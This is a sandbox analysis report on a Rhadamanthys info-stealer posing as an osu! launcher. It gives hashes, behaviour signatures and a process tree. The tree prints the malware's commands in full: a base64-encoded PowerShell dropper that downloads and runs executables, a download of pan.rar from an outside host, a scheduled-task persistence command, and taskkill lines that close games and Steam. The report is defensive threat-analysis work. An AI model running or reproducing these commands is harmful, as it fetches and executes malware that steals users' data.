rhadamanthys | 9d0eef3560fd3b6f9207a21206c4f4337b07bff2cf082869c87bdc1ddd6d2e89

Analysis

max time kernel
149s
max time network
153s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
21-05-2024 14:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Osu/Launcher.exe
Size

7KB
MD5

eee2a79d3170f463e9697ddb8b97d41e
SHA1

818c82b1743c91f423c92742b54355b2058ff417
SHA256

a4569f2cabda528425ec397aef16d6f8fc15ca94664f6f98d738d0b3dc570b41
SHA512

139b6366a088d9aaa055fae4c7853c872fe4a31dfb7dc8e3961f144db0d712342fd4e9ef6f20e5f3cbb225a4f23c3ed24e55d144f9342398e8305f54a327d5ea
SSDEEP

192:nx92qvjK3xszfzzztCbxbsIcaqcINv/DvxIcaBlNtUqKwceNdM:x91v4O5CbxbbcaqcIND6cazNt/BcebM

Score

10^/10

rhadamanthys execution stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/pancek61111111111111/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/j46j746/hg56h56h56h/raw/7db2d3da302e81e3311c7814241af0d59152a170/pan.rar

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

ofwrombu.oy10.exe

description pid process target process

PID 1568 created 2036 1568 ofwrombu.oy10.exe sihost.exe
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

2 4504 powershell.exe
3 4504 powershell.exe
4 4056 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

ofwrombu.oy10.exeofwrombu.oy11.exe

pid process

1568 ofwrombu.oy10.exe
2284 ofwrombu.oy11.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 bitbucket.org
3 bitbucket.org
4 bitbucket.org
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

4504 powershell.exe
4056 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4444 schtasks.exe

description	pid	process	target process
PID 1568 created 2036	1568	ofwrombu.oy10.exe	sihost.exe

flow	pid	process
2	4504	powershell.exe
3	4504	powershell.exe
4	4056	powershell.exe

pid	process
1568	ofwrombu.oy10.exe
2284	ofwrombu.oy11.exe

flow	ioc
1	bitbucket.org
3	bitbucket.org
4	bitbucket.org

pid	process
4444	schtasks.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
3204	timeout.exe
2952	timeout.exe
1204	timeout.exe
3964	timeout.exe
3888	timeout.exe
2572	timeout.exe
3780	timeout.exe
1548	timeout.exe
3364	timeout.exe
4852	timeout.exe
4412	timeout.exe
4748	timeout.exe
4720	timeout.exe
4912	timeout.exe
4044	timeout.exe
3152	timeout.exe
4508	timeout.exe
4628	timeout.exe
3016	timeout.exe
2564	timeout.exe
2332	timeout.exe
5104	timeout.exe
788	timeout.exe
2168	timeout.exe
2360	timeout.exe
4768	timeout.exe
4828	timeout.exe
4732	timeout.exe
3972	timeout.exe
1236	timeout.exe
4140	timeout.exe
3168	timeout.exe
3960	timeout.exe
2480	timeout.exe
1452	timeout.exe
4036	timeout.exe
3704	timeout.exe
3376	timeout.exe
2792	timeout.exe
4852	timeout.exe
3068	timeout.exe
2148	timeout.exe
3200	timeout.exe
3048	timeout.exe
1464	timeout.exe
1636	timeout.exe
2460	timeout.exe
3176	timeout.exe
1068	timeout.exe
2100	timeout.exe
3088	timeout.exe
840	timeout.exe
1672	timeout.exe
5040	timeout.exe
1880	timeout.exe
3504	timeout.exe
4388	timeout.exe
4288	timeout.exe
2192	timeout.exe
4924	timeout.exe
3576	timeout.exe
4652	timeout.exe
3440	timeout.exe
2312	timeout.exe

Enumerates processes with tasklist 1 TTPs 8 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

776 tasklist.exe
2108 tasklist.exe
1932 tasklist.exe
2752 tasklist.exe
3696 tasklist.exe
3972 tasklist.exe
3756 tasklist.exe
728 tasklist.exe
Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2656 taskkill.exe
3208 taskkill.exe
4520 taskkill.exe
2080 taskkill.exe
3468 taskkill.exe
2176 taskkill.exe
3052 taskkill.exe
1464 taskkill.exe

pid	process
776	tasklist.exe
2108	tasklist.exe
1932	tasklist.exe
2752	tasklist.exe
3696	tasklist.exe
3972	tasklist.exe
3756	tasklist.exe
728	tasklist.exe

pid	process
2656	taskkill.exe
3208	taskkill.exe
4520	taskkill.exe
2080	taskkill.exe
3468	taskkill.exe
2176	taskkill.exe
3052	taskkill.exe
1464	taskkill.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exeofwrombu.oy10.exedialer.exepowershell.exe

pid	process
4504	powershell.exe
4504	powershell.exe
4056	powershell.exe
4056	powershell.exe
1568	ofwrombu.oy10.exe
1568	ofwrombu.oy10.exe
2016	dialer.exe
2016	dialer.exe
2016	dialer.exe
2016	dialer.exe
4800	powershell.exe
4800	powershell.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exepowershell.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exetasklist.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe
Token: SeDebugPrivilege	3972	tasklist.exe
Token: SeDebugPrivilege	3208	taskkill.exe
Token: SeDebugPrivilege	3756	tasklist.exe
Token: SeDebugPrivilege	4520	taskkill.exe
Token: SeDebugPrivilege	728	tasklist.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	776	tasklist.exe
Token: SeDebugPrivilege	3468	taskkill.exe
Token: SeDebugPrivilege	2108	tasklist.exe
Token: SeDebugPrivilege	2176	taskkill.exe
Token: SeDebugPrivilege	1932	tasklist.exe
Token: SeDebugPrivilege	3052	taskkill.exe
Token: SeDebugPrivilege	2752	tasklist.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	3696	tasklist.exe
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeDebugPrivilege	4800	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Launcher.exepowershell.exeofwrombu.oy11.execmd.execmd.execmd.exeofwrombu.oy10.exe

description	pid	process	target process
PID 2768 wrote to memory of 4504	2768	Launcher.exe	powershell.exe
PID 2768 wrote to memory of 4504	2768	Launcher.exe	powershell.exe
PID 4504 wrote to memory of 1568	4504	powershell.exe	ofwrombu.oy10.exe
PID 4504 wrote to memory of 1568	4504	powershell.exe	ofwrombu.oy10.exe
PID 4504 wrote to memory of 1568	4504	powershell.exe	ofwrombu.oy10.exe
PID 4504 wrote to memory of 2284	4504	powershell.exe	ofwrombu.oy11.exe
PID 4504 wrote to memory of 2284	4504	powershell.exe	ofwrombu.oy11.exe
PID 4504 wrote to memory of 2284	4504	powershell.exe	ofwrombu.oy11.exe
PID 2284 wrote to memory of 1220	2284	ofwrombu.oy11.exe	cmd.exe
PID 2284 wrote to memory of 1220	2284	ofwrombu.oy11.exe	cmd.exe
PID 1220 wrote to memory of 4760	1220	cmd.exe	chcp.com
PID 1220 wrote to memory of 4760	1220	cmd.exe	chcp.com
PID 1220 wrote to memory of 4552	1220	cmd.exe	findstr.exe
PID 1220 wrote to memory of 4552	1220	cmd.exe	findstr.exe
PID 1220 wrote to memory of 3508	1220	cmd.exe	findstr.exe
PID 1220 wrote to memory of 3508	1220	cmd.exe	findstr.exe
PID 1220 wrote to memory of 1204	1220	cmd.exe	findstr.exe
PID 1220 wrote to memory of 1204	1220	cmd.exe	findstr.exe
PID 1220 wrote to memory of 692	1220	cmd.exe	schtasks.exe
PID 1220 wrote to memory of 692	1220	cmd.exe	schtasks.exe
PID 1220 wrote to memory of 4444	1220	cmd.exe	schtasks.exe
PID 1220 wrote to memory of 4444	1220	cmd.exe	schtasks.exe
PID 1220 wrote to memory of 2100	1220	cmd.exe	cmd.exe
PID 1220 wrote to memory of 2100	1220	cmd.exe	cmd.exe
PID 2100 wrote to memory of 5036	2100	cmd.exe	reg.exe
PID 2100 wrote to memory of 5036	2100	cmd.exe	reg.exe
PID 1220 wrote to memory of 1464	1220	cmd.exe	cmd.exe
PID 1220 wrote to memory of 1464	1220	cmd.exe	cmd.exe
PID 1464 wrote to memory of 2404	1464	cmd.exe	reg.exe
PID 1464 wrote to memory of 2404	1464	cmd.exe	reg.exe
PID 1220 wrote to memory of 4056	1220	cmd.exe	powershell.exe
PID 1220 wrote to memory of 4056	1220	cmd.exe	powershell.exe
PID 1568 wrote to memory of 2016	1568	ofwrombu.oy10.exe	dialer.exe
PID 1568 wrote to memory of 2016	1568	ofwrombu.oy10.exe	dialer.exe
PID 1568 wrote to memory of 2016	1568	ofwrombu.oy10.exe	dialer.exe
PID 1568 wrote to memory of 2016	1568	ofwrombu.oy10.exe	dialer.exe
PID 1568 wrote to memory of 2016	1568	ofwrombu.oy10.exe	dialer.exe
PID 1220 wrote to memory of 3972	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 3972	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 4548	1220	cmd.exe	find.exe
PID 1220 wrote to memory of 4548	1220	cmd.exe	find.exe
PID 1220 wrote to memory of 3208	1220	cmd.exe	taskkill.exe
PID 1220 wrote to memory of 3208	1220	cmd.exe	taskkill.exe
PID 1220 wrote to memory of 3756	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 3756	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 432	1220	cmd.exe	find.exe
PID 1220 wrote to memory of 432	1220	cmd.exe	find.exe
PID 1220 wrote to memory of 4520	1220	cmd.exe	taskkill.exe
PID 1220 wrote to memory of 4520	1220	cmd.exe	taskkill.exe
PID 1220 wrote to memory of 728	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 728	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 336	1220	cmd.exe	find.exe
PID 1220 wrote to memory of 336	1220	cmd.exe	find.exe
PID 1220 wrote to memory of 2080	1220	cmd.exe	taskkill.exe
PID 1220 wrote to memory of 2080	1220	cmd.exe	taskkill.exe
PID 1220 wrote to memory of 776	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 776	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 2420	1220	cmd.exe	find.exe
PID 1220 wrote to memory of 2420	1220	cmd.exe	find.exe
PID 1220 wrote to memory of 3468	1220	cmd.exe	taskkill.exe
PID 1220 wrote to memory of 3468	1220	cmd.exe	taskkill.exe
PID 1220 wrote to memory of 2108	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 2108	1220	cmd.exe	tasklist.exe
PID 1220 wrote to memory of 4760	1220	cmd.exe	find.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2036
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2016

C:\Users\Admin\AppData\Local\Temp\Osu\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Osu\Launcher.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Users\Admin\AppData\Roaming\ofwrombu.oy10.exe
    "C:\Users\Admin\AppData\Roaming\ofwrombu.oy10.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1568
- - C:\Users\Admin\AppData\Roaming\ofwrombu.oy11.exe
    "C:\Users\Admin\AppData\Roaming\ofwrombu.oy11.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2284
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\40A3.tmp\40A4.tmp\40A5.bat C:\Users\Admin\AppData\Roaming\ofwrombu.oy11.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1220
    - - C:\Windows\system32\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4760
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:4552
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:3508
    - - C:\Windows\system32\findstr.exe
        
        findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
        5⤵
        
        PID:1204
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /query /tn "MyBatchScript"
        5⤵
        
        PID:692
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
        5⤵
        Creates scheduled task(s)
        
        PID:4444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2100
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
        6⤵
        
        PID:5036
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1464
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
        6⤵
        
        PID:2404
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/j46j746/hg56h56h56h/raw/7db2d3da302e81e3311c7814241af0d59152a170/pan.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4056
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3972
    - - C:\Windows\system32\find.exe
        
        find /i "tf_win64.exe"
        5⤵
        
        PID:4548
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im tf_win64.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3208
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3756
    - - C:\Windows\system32\find.exe
        
        find /i "dota2.exe"
        5⤵
        
        PID:432
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im dota2.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4520
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:728
    - - C:\Windows\system32\find.exe
        
        find /i "cs2.exe"
        5⤵
        
        PID:336
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im cs2.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:776
    - - C:\Windows\system32\find.exe
        
        find /i "RustClient.exe"
        5⤵
        
        PID:2420
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im RustClient.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3468
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2108
    - - C:\Windows\system32\find.exe
        
        find /i "GTA5.exe"
        5⤵
        
        PID:4760
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im GTA5.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2176
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
    - - C:\Windows\system32\find.exe
        
        find /i "TslGame.exe"
        5⤵
        
        PID:1268
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im TslGame.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3052
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2752
    - - C:\Windows\system32\find.exe
        
        find /i "RainbowSix.exe"
        5⤵
        
        PID:4732
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im RainbowSix.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1464
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 3
        5⤵
        Delays execution with timeout.exe
        
        PID:2332
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3696
    - - C:\Windows\system32\find.exe
        
        find /i "steam.exe"
        5⤵
        
        PID:3780
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im steam.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2656
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 3
        5⤵
        Delays execution with timeout.exe
        
        PID:5040
    - - C:\Windows\system32\tar.exe
        
        tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
        5⤵
        
        PID:2720
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\Admin\Desktop\Steam.lnk'); $s.TargetPath = '\steam.exe'; $s.Save()"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4800
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2316
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4288
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1880
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4768
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2052
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3964
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4628
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4124
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3016
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1912
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4816
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4044
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:792
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3888
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3176
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2572
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2432
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3204
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3704
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4852
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4828
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2192
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3504
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3376
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3408
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5088
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1576
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3280
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3068
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2940
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3152
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2628
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4412
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1236
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3468
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1584
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3684
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3960
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4748
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4720
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1204
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4444
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4924
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1068
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2100
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4732
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4388
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4140
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1916
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4508
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2480
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:788
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3780
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
